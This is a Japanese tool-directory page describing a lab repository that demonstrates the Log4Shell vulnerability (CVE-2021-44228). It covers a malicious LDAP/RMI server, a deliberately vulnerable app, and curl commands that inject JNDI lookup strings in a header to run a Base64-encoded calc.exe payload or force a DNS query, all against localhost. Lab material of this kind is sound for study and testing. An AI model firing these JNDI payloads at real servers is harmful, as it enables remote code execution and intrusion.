Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
log4j-cve-2021-44228 — Log4j CVE-2021-44228 の例: リモートコード実行 (LDAP、RMI、... 経由)、強制DNSクエリ、... | Kitploit
ツール/GitHubGitHub/manuel-alvarez-alvarez/log4j-cve-2021-44228
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubmanuel-alvarez-alvarez/log4j-cve-2021-44228

log4j-cve-2021-44228

Log4j CVE-2021-44228 の例: リモートコード実行 (LDAP、RMI、... 経由)、強制DNSクエリ、...

リポジトリを見る
5124年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Log4j CVE-2021-44228 および CVE-2021-45046

前提条件

脆弱なJDKを使用してください。例: JDK 1.8.0_181

使用方法

悪意のあるサーバー

悪意のあるサーバーは以下のエンドポイントをデプロイします:

  • 1389 LDAPサーバー
  • 1099 RMIサーバー
  • 8081 HTTPサーバー
root@kitploit:~
./gradlew :malicious-server:bootRun

脆弱なアプリケーション

脆弱なアプリケーションは、8082 に1つのHTTPエンドポイントをデプロイします。

root@kitploit:~
./gradlew :vulnerable-app:bootRun

リモートコード実行

脆弱なアプリケーションで実行されるペイロードを選択し、Base64でエンコードします。例として、Windowsで電卓を開くには: calc.exe

LDAP

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

RMI

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

DNSクエリ

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/
ツールをダウンロード